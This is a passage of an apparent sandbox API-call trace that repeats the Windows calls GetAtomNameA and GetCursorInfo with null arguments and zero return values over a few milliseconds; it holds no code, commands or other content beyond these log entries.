pci=0x0 | out: pci=0x0) returned 0 [0181.634] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.634] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.635] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.635] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.636] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.636] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.637] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.637] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.637] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.637] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.637] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.637] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.637] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.638] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.638] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.639] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.639] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.640] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.640] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.641] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.641] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.641] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.641] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.641] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.641] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.641] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.642] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.642] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.643] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.643] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.644] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.644] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.645] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.645] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.646] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.646] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.647] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.647] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.648] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.648] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.651] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.651] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.652] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.652] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0181.653] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0181.653] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 